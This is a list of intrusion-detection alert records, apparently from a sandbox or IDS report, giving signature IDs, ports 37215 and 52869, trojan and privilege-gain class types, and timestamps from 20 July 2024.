                      SID:2829579
                      Source Port:34654
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.322614
                      SID:2025132
                      Source Port:60750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.333071
                      SID:2831300
                      Source Port:39858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.520303
                      SID:2027339
                      Source Port:33856
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.156820
                      SID:2835222
                      Source Port:34000
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.961552
                      SID:2025132
                      Source Port:42842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.158709
                      SID:2027339
                      Source Port:38834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.537827
                      SID:2025132
                      Source Port:59670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.316096
                      SID:2025132
                      Source Port:49258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.645051
                      SID:2829579
                      Source Port:55228
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.286382
                      SID:2027339
                      Source Port:45518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.820768
                      SID:2025132
                      Source Port:45600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.504284
                      SID:2831300
                      Source Port:33126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.420081
                      SID:2831300
                      Source Port:33654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.147289
                      SID:2831300
                      Source Port:41806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.050503
                      SID:2829579
                      Source Port:38646
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.841280
                      SID:2027339
                      Source Port:60678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.845923
                      SID:2027339
                      Source Port:55978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.677933
                      SID:2027339
                      Source Port:37062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.278428
                      SID:2027339
                      Source Port:37428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631010
                      SID:2835222
                      Source Port:55038
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.965905
                      SID:2027339
                      Source Port:56456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.640473
                      SID:2027339
                      Source Port:33286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221504
                      SID:2835222
                      Source Port:48608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.395457
                      SID:2027339
                      Source Port:52660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.757513
                      SID:2025132
                      Source Port:35420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.308250
                      SID:2025132
                      Source Port:47302
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.745352
                      SID:2027339
                      Source Port:50118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.933370
                      SID:2835222
                      Source Port:52192
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.614619
                      SID:2831300
                      Source Port:59020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.839255
                      SID:2025132
                      Source Port:41974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.762457
                      SID:2025132
                      Source Port:40778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.497728
                      SID:2831300
                      Source Port:37924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.113314
                      SID:2027339
                      Source Port:55710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.040812
                      SID:2835222
                      Source Port:51258
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.848727
                      SID:2025132
                      Source Port:52016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.318305
                      SID:2027339
                      Source Port:53044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.178062
                      SID:2835222
                      Source Port:34032
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.365783
                      SID:2027339
                      Source Port:36496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.667239
                      SID:2025132
                      Source Port:53328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.838689
                      SID:2831300
                      Source Port:55674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.947006
                      SID:2831300
                      Source Port:60546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.602081
                      SID:2027339
                      Source Port:49514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.046626
                      SID:2835222
                      Source Port:54504
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.653309
                      SID:2829579
                      Source Port:56710
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.850156
                      SID:2027339
                      Source Port:35398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.590754
                      SID:2831300
                      Source Port:38592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.960666
                      SID:2027339
                      Source Port:56690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.249014
                      SID:2027339
                      Source Port:58350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.058685
                      SID:2027339
                      Source Port:44428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.114673
                      SID:2829579
                      Source Port:53382
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.380560
                      SID:2027339
                      Source Port:34342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.979565
                      SID:2835222
                      Source Port:40992
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.810143
                      SID:2027339
                      Source Port:35336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.675171
                      SID:2027339
                      Source Port:39908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.378725
                      SID:2025132
                      Source Port:50554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.642449
                      SID:2829579
                      Source Port:49292
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.862410
                      SID:2829579
                      Source Port:40984
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.058686
                      SID:2027339
                      Source Port:53072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.602024
                      SID:2831300
                      Source Port:52422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.729502
                      SID:2025132
                      Source Port:49908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.987215
                      SID:2025132
                      Source Port:58068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.259813
                      SID:2027339
                      Source Port:46320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.576561
                      SID:2831300
                      Source Port:49878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.138392
                      SID:2025132
                      Source Port:53770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:10.523865
                      SID:2027339
                      Source Port:35540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.816504
                      SID:2829579
                      Source Port:53168
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.629198
                      SID:2831300
                      Source Port:56362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.523523
                      SID:2027339
                      Source Port:33250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.679304
                      SID:2835222
                      Source Port:56008
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.653586
                      SID:2835222
                      Source Port:39140
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.382207
                      SID:2831300
                      Source Port:51494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.194576
                      SID:2835222
                      Source Port:60616
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.068475
                      SID:2027339
                      Source Port:45506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.327808
                      SID:2027339
                      Source Port:32914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.005156
                      SID:2829579
                      Source Port:57052
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.062043
                      SID:2831300
                      Source Port:48916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.934977
                      SID:2829579
                      Source Port:50816
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.611556
                      SID:2027339
                      Source Port:47134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.677814
                      SID:2831300
                      Source Port:43900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.466756
                      SID:2831300
                      Source Port:40356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.825081
                      SID:2027339
                      Source Port:39182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.321965
                      SID:2829579
                      Source Port:53252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.036064
                      SID:2829579
                      Source Port:56934
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.640312
                      SID:2829579
                      Source Port:35956
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.977603
                      SID:2829579
                      Source Port:45528
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.266946
                      SID:2027339
                      Source Port:49308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.642449
                      SID:2835222
                      Source Port:41180
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.651394
                      SID:2025132
                      Source Port:32944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.040812
                      SID:2835222
                      Source Port:54746
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.971099
                      SID:2831300
                      Source Port:38696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.783977
                      SID:2025132
                      Source Port:40278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:03:46.030378
                      SID:2025132
                      Source Port:41142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.588009
                      SID:2831300
                      Source Port:34436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.924014
                      SID:2027339
                      Source Port:57080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.633481
                      SID:2829579
                      Source Port:58682
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.022244
                      SID:2025132
                      Source Port:48646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.953142
                      SID:2831300
                      Source Port:46738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.484243
                      SID:2025132
                      Source Port:59706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.036064
                      SID:2835222
                      Source Port:36302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.405053
                      SID:2831300
                      Source Port:33808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.036012
                      SID:2027339
                      Source Port:51362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.258057
                      SID:2027339
                      Source Port:53762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.087294
                      SID:2025132
                      Source Port:41836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.495508
                      SID:2025132
                      Source Port:32926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:12.861753
                      SID:2831300
                      Source Port:60648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.150638
                      SID:2829579
                      Source Port:60702
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.063335
                      SID:2027339
                      Source Port:45256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.640312
                      SID:2835222
                      Source Port:35956
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.636425
                      SID:2835222
                      Source Port:50264
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.198416
                      SID:2831300
                      Source Port:47642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.640831
                      SID:2027339
                      Source Port:55554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.509003
                      SID:2025132
                      Source Port:48078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.293630
                      SID:2027339
                      Source Port:36548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.947779
                      SID:2025132
                      Source Port:45322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:13.299019
                      SID:2027339
                      Source Port:35426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.332650
                      SID:2835222
                      Source Port:37688
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.601575
                      SID:2831300
                      Source Port:57282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.273926
                      SID:2027339
                      Source Port:36792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.572556
                      SID:2831300
                      Source Port:44650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.707761
                      SID:2027339
                      Source Port:33544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.790282
                      SID:2025132
                      Source Port:58736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.076414
                      SID:2829579
                      Source Port:50714
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:08.171169
                      SID:2027339
                      Source Port:48478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.570605
                      SID:2025132
                      Source Port:45240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.152613
                      SID:2027339
                      Source Port:50726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.122550
                      SID:2027339
                      Source Port:47904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.820979
                      SID:2835222
                      Source Port:35366
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.179680
                      SID:2027339
                      Source Port:58360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639011
                      SID:2829579
                      Source Port:44098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.816521
                      SID:2829579
                      Source Port:33148
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.576250
                      SID:2027339
                      Source Port:41576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.053062
                      SID:2835222
                      Source Port:60982
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.890780
                      SID:2027339
                      Source Port:60936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.151857
                      SID:2027339
                      Source Port:36342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.359091
                      SID:2027339
                      Source Port:35414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.500950
                      SID:2027339
                      Source Port:34280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.476708
                      SID:2025132
                      Source Port:40524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.067695
                      SID:2831300
                      Source Port:50730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:14.686790
                      SID:2025132
                      Source Port:55400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.943544
                      SID:2829579
                      Source Port:53068
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.014738
                      SID:2027339
                      Source Port:60576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.991545
                      SID:2025132
                      Source Port:55570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.779951
                      SID:2025132
                      Source Port:37504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.921490
                      SID:2831300
                      Source Port:47776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:50.807258
                      SID:2027339
                      Source Port:35422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.590754
                      SID:2831300
                      Source Port:56354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.655551
                      SID:2829579
                      Source Port:48700
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.653654
                      SID:2027339
                      Source Port:60364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.181938
                      SID:2829579
                      Source Port:32836
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.156801
                      SID:2027339
                      Source Port:60570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.751824
                      SID:2025132
                      Source Port:44208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.365017
                      SID:2025132
                      Source Port:51488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.588824
                      SID:2027339
                      Source Port:37778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.197088
                      SID:2831300
                      Source Port:33372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.048367
                      SID:2835222
                      Source Port:36266
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.661049
                      SID:2831300
                      Source Port:58624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.809715
                      SID:2831300
                      Source Port:57964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.720668
                      SID:2831300
                      Source Port:45442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.305893
                      SID:2025132
                      Source Port:40326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.059312
                      SID:2835222
                      Source Port:45912
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.104766
                      SID:2025132
                      Source Port:44562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.745266
                      SID:2025132
                      Source Port:38978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.334452
                      SID:2835222
                      Source Port:37766
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.885298
                      SID:2027339
                      Source Port:49372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.660608
                      SID:2831300
                      Source Port:35026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.311124
                      SID:2829579
                      Source Port:59782
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.442441
                      SID:2027339
                      Source Port:60254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.540580
                      SID:2025132
                      Source Port:53822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.163877
                      SID:2027339
                      Source Port:47156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.965786
                      SID:2027339
                      Source Port:58068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.703257
                      SID:2025132
                      Source Port:48238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.312311
                      SID:2831300
                      Source Port:44086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.325814
                      SID:2831300
                      Source Port:35148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:50.949008
                      SID:2027339
                      Source Port:60078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.296076
                      SID:2835222
                      Source Port:46558
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.755168
                      SID:2027339
                      Source Port:52648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639012
                      SID:2835222
                      Source Port:37310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.328066
                      SID:2831300
                      Source Port:49834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.631549
                      SID:2829579
                      Source Port:49196
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
